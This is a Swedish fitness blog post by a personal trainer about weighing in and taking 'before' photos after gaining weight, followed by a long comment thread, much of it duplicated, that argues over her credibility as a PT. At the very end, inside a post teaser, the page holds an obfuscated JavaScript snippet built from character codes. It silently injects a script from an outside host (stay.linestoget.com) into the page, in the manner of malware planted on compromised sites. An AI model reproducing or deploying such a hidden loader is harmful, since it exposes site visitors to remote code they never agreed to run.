Dags för mätning, invägning och att se sanningen i vitögat!

GODMORGON! 

 

_DS_2154

Hej fina!

Fy bövelen så långt jag har låtit det gå! Jag ska strax se sanningen i vitögat! jisses vad jobbigt! 

”latmaskar” kan vi alla vara ibland. Det är helt okay. Men när man är MER latmask än aktiv, då kan det behövas en spark i baken!

Jag personligen hinner ju knappt komma igång förrän jag råkar ut för något och får börja rehab-träna igen. (Känner mig lite som ”oturs Olga!”) SUCK!

Men som flera gånger tidigare så ska jag ännu en gång rehabträna och se till att själv komma iform igen. Jag tränar andra människor på daglig basis. Jag ser hur dessa människor kämpar, och lyckas. DET ge mig en kick. Att få vara med på en resa och få se glädjen i deras ögon när dom uppnår målet. DET är outstanding! 

Men nu ska jag själv ta ytterligare ett steg framåt i min personliga utveckling. Jag hat gjort en 180 i livet. Utbildningen och vardagen är helt ny för mig. Ett steg i taget, åt ett nytt håll. Jag balanserar gör att hitta ”mig” i mitt nya jag.. 

Jag har gått upp en massa kilo i vikt. Jag ska nu, alldeles strax möta upp en av dom två PT som jag kommer att träna med en tid. Vi ska mäta, väga och ta före bilder! Fy f*n rent ut sagt för att ta före bilder! Det är det VÄRSTA jag vet! Jag är helt av banan, helt ur form! Både fysiskt och mentalt! Det ena uteslutet inte det andra, fullt fokus på att bli stark och pigg…. Inifrån och ut! 

Bilder är alltid Sjukt jobbigt att ta. Just när man känner sig så kolliderat ut form! Men kul att ha sen. Bra för att motivera sig själv till att inte spåra ur och hamna där igen.

 Jag vet faktiskt inte varför jag gått upp så pass mycket som jag gjort. En kombination av stress, depression, lite sömn, oregelbunden kost och att jag slutat röka och börjat småäta istället.

Men som min morbror Kari sa ”Det är aldrig försent att börja, men alltid för tidigt att sluta” 

_DS_2142

Nu ger jag mig själv en spark i baken! Jag använder min egna kompetens och kunskap, tar hjälp av dom jag behöver och sätter igång! 

jag har satt upp olika mål, och delmål. Jag fokuserar inte bara på vågen även om den också är inblandad såklart. jag kommer mäta och väga fettprocenten. Jag har också satt upp teknik och andra styrkemål. Som ett av flera exempel är att jag vill kunna göra chins. Utan maskinen som du ser ovan. Utan gummiband. 

Jag vill kunna göra det utan hjälpmedel på egen hand.

Det är ett av mina m ål som motiverar mig.

Sen att jag ska kunna få upp jeansen över låren… Det är också en morot, kan jag väl erkänna 😉 hehe!

IMG_0169

IMG_9444 FullSizeRender IMG_9111

Min ena PT Godde! =) VI hörs senare fina du!

Stor kram! Tack för att DU finna <3 /My Martens

Foto cred Pavel Maira

79 Komentarer

 1. Lycka till idag! Förstår att det är lite jobbigt om man själv tycker att man inte kunnat träna som man vill. Du är så himla duktig och fin vad du än själv tycker. Kom ihåg det. Kram Annika

 2. Lycka till idag! Förstår att det är lite jobbigt om man själv tycker att man inte kunnat träna som man vill. Du är så himla duktig och fin vad du än själv tycker. Kom ihåg det. Kram Annika

 3. Som PT borde du väl föregå med ett gott exempel åt dina kunder, skulle inte själv ha nåt förtroende om det klev in en PT med 13kilos övervikt och självförtrendet i botten och som ska försöka peppa mig till att komma iform….. då hade jag gett upp efter första försöket!

  • Jag tycker tvärtom. Den bästa pepp jag får är från människor som visar att man trots något extra kilo kan inspirera och sikta framåt. Att träna för sitt välmående är viktigast, att trivas med sin kropp. Då tycker jag det känns jobbigare med en PT som är perfekt och superfit.
   För övrigt tycker jag att My ser jättefin ut, jag har svårt att se någon övervikt.

   • Det är tanken…. Ska utveckl detta sen. Har några kunder nu… En hälsoresa gör man i olika steg. Man har med och motgång. Det hör till.. Utvecklar sen ? Kram

   • ja men en PT som ändrar kost titt som tätt boost, detox det ena med det andra… och ändå bara går upp i vikt…. får kostschema av nån släkting som hon ändå inte följer…. och blir bara sjuk titt som tätt då är det ju nåt som inte stämmer! skulle jag anlita en PT då vill jag ha en som vet vad hen pratar om kunna ge bra kostförslag vad jag ska äta och hur, inte en som velar upp och ner som en berg och dalbana. tror hon är dålig reklam för SATS borde nog utbilda sig mer så hon vet vad hon pratar om. Titta på Toftby hon är en riktig inspiratör och som kan mycket om träning och kost…jävligt duktig PT skulle hon vara

    • Visst är det jättebra? Att inte alla PT är stöpta i samma form. Eftersom alla som anlitar PT inte heller är stöpta i samma form.

    • Hello =) Vad har Johanna Toftby med mig och mitt yrke som PT att göra? Hon påbörjade sin PT utbildning, men avslutade den aldrig…. Vad vet DU om MIN kost? Berätta gärna, för det låter nämligen som om du har mer koll än vad jag har själv? hehe!

     • Din kost vet jag inget om förutom det vad du lägger ut på bloggen!utemat!!!! har aldrig sett några inspirerande recept på din blogg förutom rawbollar och ica smoowie…. inga recept som man förväntar sig att en PT skulle kunna rekommendera…Men alla är vi olika endel kanske klarar sig på bollarna och smoowies… kanske därför man blir sjuk ofta,vad vet jag men lycka till med dina PT kunder

    • Toftby??? vad har hon för erfarenhet? började på och skrev så mycket om sin PT utbildning för länge sedan men vad hände med den?
     Heja My men jag håller med de som skrivit att du har för mycket på gång att du ska koncentrera dig på en sak i taget nu tills dess att du är stark nog både på in-och utsidan och komma tillbaks på riktigt.

  • Hej Marre! 13 kilos övervikt? jag skriver att jag har gått upp 13 kilo i vikt. DET är någonting helt annat, det är inte 13 kilos ”övervikt” för det.
   Oavsett vad, om det Skulle göra att du ger upp efter första försöket till att uppnå DINA mål. ja, då dessvärre säger det mer om dig än om mig som person.
   Som PT så handlar det om att guida, coacha och träna mina kunder för att dom ska uppnå sina personliga mål. Det är väldigt individuellt, några exempel på vad jag jobbar med just nu. Någon vill gå upp i vikt, behöver både öka muskelvolym och fettprocent. Någon rehab-tränar efter opererade diskbråck och tillsammans gör vi allt för att uppnå en starkare och mindre smärtsam vardag. Några jobbar med extra kilon efter graviditet. (Jag är inriktad mamma/gravid tränare) Någon ska tävla och vi övar både teknik och bygger styrka. Någon behöver bli stark i sin vardag. Någon ska snart göra ett fys test som ingår i hens polisutbildning… Jag kan fortsätta HUR länge som helst.
   Poängen är följande. Oavsett vad man har för individuella mål, så är min roll som personlig tränare att vara en del av kundens resa mot sina nya mål. Min viktuppgång på 13kilo påverkar inte detta.
   Jag har gjort stora förändringar under flera års tid. Operationer, sjukdom, stress och 2 stora livskriser. Sorg efter dödsfall och två flytt på det. Förutom det är jag mamma, och gör mitt bästa för att vara den bästa mamman som jag kan. För min son, som är mitt allt.
   Jag bestämde mig en dag för att ”ta tag i livet”. Att prioritera om för att kunna leva det liv som JAG vill leva. Hälsa är ett brett begrepp. Det kan vara väldigt olika från person till person. Jag strävar efter en hållbar hälsa, och att laga och bygga upp min ”trasiga” kropp, att rehabilitera mig stark och frisk. På alla plan. Jag har satt upp mål. Både kortsiktiga och långsiktiga. för förra året, för detta året, och nästa och nästa osv.
   Jag är BETYDLIGT närmare idag än vad jag var för bara några år sedan. Jag är 29 år med hela livet framför mig. Jag tar ett steg i taget.
   Jag har ett brokigt förflutet och är väldigt stolt över vart jag kommit idag.
   Själva viktuppgångens på 13 kilo behöver man inte vara en Einstein för att räkna ut vad som gått snett. Jag har slutat röka. Gått från storrökare till rökfri. Ersatt en del av suget med att småäta. Samtidigt som jag gick in och började utbilda mig, en tung, omfattande intensiv utbildning 6dag/veckan. i månader ringde klockan 04:45 VARJE morgon. Jag gick in och började arbete heltid inom träningsbranschen, som PT, som hälsoinspiratör, som skribent, som instruktör osv. En kombination av två ”sjuk perioder” med träningsuppehåll och rehab som påföljd.
   Den senaste omskrivna med operationer var mellan jul och nyår. Akut op, av blindarm och njursten gjorde mig liggande i nästan fyra veckor. DET tar tid att resa sig igen. Oavsett om man är ung eller gammal, smal eller tjock, PT eller inte.
   Efter konkursen har jag haft jätte problem med inre stress, och ångest. När man är stressad utsöndrar man kortisol. Kortisolen har gjort att min ämnesomsättning stannat av helt. Jag har ett SKY-högt kortisol värde. Jag fick beskedet, jag är medveten om det och jag jobbar på det. DET påverkar inte min yrkesroll som Personlig tränare. Jag lämnar blodprov var 14.e dag just nu.
   Skulle detta påverka min kompetens som PT? TVÄRT om, livet är inte alltid en dans på rosor. Man kommer stöta på både med och motgångar. Både jag själv, men också mina kunder. Jag tar med mig mina erfarenheter, från både med och motgång och använder dom som en nyckel till en framgång mot varje persons individuella mål.
   Jag har varit kraftigt överviktig på mina dryga 100 kilo, jag har varit utbränd, jag har (och har fortfarande) erfarenhet av ångest. Jag har varit en periodare med träning, jag har haft matmissbruk och fått opereras pga av diasats efter graviditet (delad bukmuskulatur) Jag har kämpat i TVÅ år med rehab från denna. Jag VET hur kämpigt det kan vara ibland. Men det får mig inte att ge upp, eller att tvivla på mig själv. Tvärt om, det motiverar mig bara ännu mer. I tränings och hälso branschen blir man aldrig fullärd.
   Jag älskar min kropp, både med och utan 13 kilos viktuppgång. Jag älskar mitt jobb och mitt yrke. Men framförallt så brinner jag från hjärtat för att jobba med människor som vill göra en livstidsförändring! / My Martens

  • marre.
   Kram på dig. Jag tycker du har helt fel i vad du tycker. My är inte överviktig.
   Kanske en tripp till SpecSavers skulle kunna hjälpa.
   Jag förstår att du inte haft det lätt. Blev du mobbad? bedragen? inte sedd? eller vad hände? Jag skulle skriva recept på KBT. Du kommer lära dig att se dig själv för den fina människa du egentligen är, lära dig att du duger som du är. Du skulle få verktyg att växa. Så ta ett djupt andetag och gå ut och se världen att den är vacker om man bara vill. Du duger som du är marre.

 4. Hej hopp ? den där råsaften du visade i förra inlägget såg otroligt god ut, var hittar man sådana…jag blev så sugen…
  Kram ❤️

 5. Som PT borde du väl föregå med ett gott exempel åt dina kunder, skulle inte själv ha nåt förtroende om det klev in en PT med 13kilos övervikt och självförtrendet i botten och som ska försöka peppa mig till att komma iform….. då hade jag gett upp efter första försöket!

  • Jag tycker tvärtom. Den bästa pepp jag får är från människor som visar att man trots något extra kilo kan inspirera och sikta framåt. Att träna för sitt välmående är viktigast, att trivas med sin kropp. Då tycker jag det känns jobbigare med en PT som är perfekt och superfit.
   För övrigt tycker jag att My ser jättefin ut, jag har svårt att se någon övervikt.

   • Det är tanken…. Ska utveckl detta sen. Har några kunder nu… En hälsoresa gör man i olika steg. Man har med och motgång. Det hör till.. Utvecklar sen 😀 Kram

   • ja men en PT som ändrar kost titt som tätt boost, detox det ena med det andra… och ändå bara går upp i vikt…. får kostschema av nån släkting som hon ändå inte följer…. och blir bara sjuk titt som tätt då är det ju nåt som inte stämmer! skulle jag anlita en PT då vill jag ha en som vet vad hen pratar om kunna ge bra kostförslag vad jag ska äta och hur, inte en som velar upp och ner som en berg och dalbana. tror hon är dålig reklam för SATS borde nog utbilda sig mer så hon vet vad hon pratar om. Titta på Toftby hon är en riktig inspiratör och som kan mycket om träning och kost…jävligt duktig PT skulle hon vara

    • Visst är det jättebra? Att inte alla PT är stöpta i samma form. Eftersom alla som anlitar PT inte heller är stöpta i samma form.

    • Hello =) Vad har Johanna Toftby med mig och mitt yrke som PT att göra? Hon påbörjade sin PT utbildning, men avslutade den aldrig…. Vad vet DU om MIN kost? Berätta gärna, för det låter nämligen som om du har mer koll än vad jag har själv? hehe!

     • Din kost vet jag inget om förutom det vad du lägger ut på bloggen!utemat!!!! har aldrig sett några inspirerande recept på din blogg förutom rawbollar och ica smoowie…. inga recept som man förväntar sig att en PT skulle kunna rekommendera…Men alla är vi olika endel kanske klarar sig på bollarna och smoowies… kanske därför man blir sjuk ofta,vad vet jag men lycka till med dina PT kunder

    • Toftby??? vad har hon för erfarenhet? började på och skrev så mycket om sin PT utbildning för länge sedan men vad hände med den?
     Heja My men jag håller med de som skrivit att du har för mycket på gång att du ska koncentrera dig på en sak i taget nu tills dess att du är stark nog både på in-och utsidan och komma tillbaks på riktigt.

  • Hej Marre! 13 kilos övervikt? jag skriver att jag har gått upp 13 kilo i vikt. DET är någonting helt annat, det är inte 13 kilos ”övervikt” för det.

   Oavsett vad, om det Skulle göra att du ger upp efter första försöket till att uppnå DINA mål. ja, då dessvärre säger det mer om dig än om mig som person.

   Som PT så handlar det om att guida, coacha och träna mina kunder för att dom ska uppnå sina personliga mål. Det är väldigt individuellt, några exempel på vad jag jobbar med just nu. Någon vill gå upp i vikt, behöver både öka muskelvolym och fettprocent. Någon rehab-tränar efter opererade diskbråck och tillsammans gör vi allt för att uppnå en starkare och mindre smärtsam vardag. Några jobbar med extra kilon efter graviditet. (Jag är inriktad mamma/gravid tränare) Någon ska tävla och vi övar både teknik och bygger styrka. Någon behöver bli stark i sin vardag. Någon ska snart göra ett fys test som ingår i hens polisutbildning… Jag kan fortsätta HUR länge som helst.

   Poängen är följande. Oavsett vad man har för individuella mål, så är min roll som personlig tränare att vara en del av kundens resa mot sina nya mål. Min viktuppgång på 13kilo påverkar inte detta.

   Jag har gjort stora förändringar under flera års tid. Operationer, sjukdom, stress och 2 stora livskriser. Sorg efter dödsfall och två flytt på det. Förutom det är jag mamma, och gör mitt bästa för att vara den bästa mamman som jag kan. För min son, som är mitt allt.

   Jag bestämde mig en dag för att ”ta tag i livet”. Att prioritera om för att kunna leva det liv som JAG vill leva. Hälsa är ett brett begrepp. Det kan vara väldigt olika från person till person. Jag strävar efter en hållbar hälsa, och att laga och bygga upp min ”trasiga” kropp, att rehabilitera mig stark och frisk. På alla plan. Jag har satt upp mål. Både kortsiktiga och långsiktiga. för förra året, för detta året, och nästa och nästa osv.

   Jag är BETYDLIGT närmare idag än vad jag var för bara några år sedan. Jag är 29 år med hela livet framför mig. Jag tar ett steg i taget.

   Jag har ett brokigt förflutet och är väldigt stolt över vart jag kommit idag.

   Själva viktuppgångens på 13 kilo behöver man inte vara en Einstein för att räkna ut vad som gått snett. Jag har slutat röka. Gått från storrökare till rökfri. Ersatt en del av suget med att småäta. Samtidigt som jag gick in och började utbilda mig, en tung, omfattande intensiv utbildning 6dag/veckan. i månader ringde klockan 04:45 VARJE morgon. Jag gick in och började arbete heltid inom träningsbranschen, som PT, som hälsoinspiratör, som skribent, som instruktör osv. En kombination av två ”sjuk perioder” med träningsuppehåll och rehab som påföljd.

   Den senaste omskrivna med operationer var mellan jul och nyår. Akut op, av blindarm och njursten gjorde mig liggande i nästan fyra veckor. DET tar tid att resa sig igen. Oavsett om man är ung eller gammal, smal eller tjock, PT eller inte.

   Efter konkursen har jag haft jätte problem med inre stress, och ångest. När man är stressad utsöndrar man kortisol. Kortisolen har gjort att min ämnesomsättning stannat av helt. Jag har ett SKY-högt kortisol värde. Jag fick beskedet, jag är medveten om det och jag jobbar på det. DET påverkar inte min yrkesroll som Personlig tränare. Jag lämnar blodprov var 14.e dag just nu.

   Skulle detta påverka min kompetens som PT? TVÄRT om, livet är inte alltid en dans på rosor. Man kommer stöta på både med och motgångar. Både jag själv, men också mina kunder. Jag tar med mig mina erfarenheter, från både med och motgång och använder dom som en nyckel till en framgång mot varje persons individuella mål.

   Jag har varit kraftigt överviktig på mina dryga 100 kilo, jag har varit utbränd, jag har (och har fortfarande) erfarenhet av ångest. Jag har varit en periodare med träning, jag har haft matmissbruk och fått opereras pga av diasats efter graviditet (delad bukmuskulatur) Jag har kämpat i TVÅ år med rehab från denna. Jag VET hur kämpigt det kan vara ibland. Men det får mig inte att ge upp, eller att tvivla på mig själv. Tvärt om, det motiverar mig bara ännu mer. I tränings och hälso branschen blir man aldrig fullärd.

   Jag älskar min kropp, både med och utan 13 kilos viktuppgång. Jag älskar mitt jobb och mitt yrke. Men framförallt så brinner jag från hjärtat för att jobba med människor som vill göra en livstidsförändring! / My Martens

  • marre.
   Kram på dig. Jag tycker du har helt fel i vad du tycker. My är inte överviktig.
   Kanske en tripp till SpecSavers skulle kunna hjälpa.
   Jag förstår att du inte haft det lätt. Blev du mobbad? bedragen? inte sedd? eller vad hände? Jag skulle skriva recept på KBT. Du kommer lära dig att se dig själv för den fina människa du egentligen är, lära dig att du duger som du är. Du skulle få verktyg att växa. Så ta ett djupt andetag och gå ut och se världen att den är vacker om man bara vill. Du duger som du är marre.

 6. Hej hopp 😘 den där råsaften du visade i förra inlägget såg otroligt god ut, var hittar man sådana…jag blev så sugen…
  Kram ❤️

 7. Lycka till My!! Du är verkligen så modig o ärlig som ” vågar” skriva o berätta i med o motgång. Det är väldigt starkt att som PT delge att som du i detta faller har gått uppbi vikt o inte är i form. Grymt bra tycker jag för alla är vi människor o livet är upp o ner så det är inte konstigare än så. Önskar dig all lycka till och jag tycker tvärtom mot kommentaren här uppe, jag får förtroende för ärlighet o mänsklighet det får man genom olika erfarenheter o det du nu ska göra med dig själv kommer du kunna har som lärdom till dina kunder framöver. Kram

 8. Lycka till My!! Du är verkligen så modig o ärlig som ” vågar” skriva o berätta i med o motgång. Det är väldigt starkt att som PT delge att som du i detta faller har gått uppbi vikt o inte är i form. Grymt bra tycker jag för alla är vi människor o livet är upp o ner så det är inte konstigare än så. Önskar dig all lycka till och jag tycker tvärtom mot kommentaren här uppe, jag får förtroende för ärlighet o mänsklighet det får man genom olika erfarenheter o det du nu ska göra med dig själv kommer du kunna har som lärdom till dina kunder framöver. Kram

 9. Jag håller helt med den andra Anna. Man har väl mer förtroende för någon som själv kämpar med sin vikt och som kan sätta sig in i ens sits. Kämpa på My!! Sluta röka, dina sjukdoms bilder med rehab, klart att det blir negativ effekt. Du är snart på rätt väg! // ölänning

 10. Känner att jag skulle få mer förtroende för en PT som verkligen visar sig äkta så som My ju faktiskt gör. Man är väl bara människa,oavsett om man är PT eller inte. Alla drabbas av motgångar någon gång i livet.

 11. Jag håller helt med den andra Anna. Man har väl mer förtroende för någon som själv kämpar med sin vikt och som kan sätta sig in i ens sits. Kämpa på My!! Sluta röka, dina sjukdoms bilder med rehab, klart att det blir negativ effekt. Du är snart på rätt väg! // ölänning

 12. Känner att jag skulle få mer förtroende för en PT som verkligen visar sig äkta så som My ju faktiskt gör. Man är väl bara människa,oavsett om man är PT eller inte. Alla drabbas av motgångar någon gång i livet.

  • Man ska inte ”fastna” för mycket vid vikten som står på vågen.. men jag har låtit det gå för långt.. Ska skriva ett inlägg om detta lite senare.. Tack! <3 Kram

 13. Hej My
  Måste fråga dig. Du har opererat dig, du startar nytt liv, nya mål, äter enligt olika scheman, tränar, utbildar dig inom kost och hälsa, omger dig med finess folk mm mm. Ändå uppnår du inte de resultat du vill? Hur känner du för det? Måste vara så frustrerande. Yamaha hand om dig. Kram

  • Man ska inte ”fastna” för mycket vid vikten som står på vågen.. men jag har låtit det gå för långt.. Ska skriva ett inlägg om detta lite senare.. Tack! <3 Kram

 14. Hej My

  Måste fråga dig. Du har opererat dig, du startar nytt liv, nya mål, äter enligt olika scheman, tränar, utbildar dig inom kost och hälsa, omger dig med finess folk mm mm. Ändå uppnår du inte de resultat du vill? Hur känner du för det? Måste vara så frustrerande. Yamaha hand om dig. Kram

 15. Jag hade gladeligen haft dig som PT My! Du verkar vara genuint äkta och det tilltalar mig. Tycker du verkar vara en fighter och för mig är du en förebild!

 16. Jag hade då hellre önskat mig en PT som känns mänsklig o kan relatera till egna erfarenheter samt upp och nedgångar i livet. Inte en där ytan är det enda som räknas. Sen är det fortfarande så att det inte är enbart siffran på vågen som avgör om du är hälsosam eller ej…
  Tack My för en bra blogg med mer djup än de flesta ?

 17. Jag hade gladeligen haft dig som PT My! Du verkar vara genuint äkta och det tilltalar mig. Tycker du verkar vara en fighter och för mig är du en förebild!

 18. Jag hade då hellre önskat mig en PT som känns mänsklig o kan relatera till egna erfarenheter samt upp och nedgångar i livet. Inte en där ytan är det enda som räknas. Sen är det fortfarande så att det inte är enbart siffran på vågen som avgör om du är hälsosam eller ej…

  Tack My för en bra blogg med mer djup än de flesta 😊

 19. My kan inte folk bara lägga ner alla jäkla elaka kommentarer nu. Så trött på det, skulle mycket gärna ha dig som pt. Tror nog att signaturen marre/herr Emil/och herr fästman till toftby är en o samma man. Falskt är ordet på dessa. Vi hejar på dig my❤️

 20. My kan inte folk bara lägga ner alla jäkla elaka kommentarer nu. Så trött på det, skulle mycket gärna ha dig som pt. Tror nog att signaturen marre/herr Emil/och herr fästman till toftby är en o samma man. Falskt är ordet på dessa. Vi hejar på dig my❤️

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/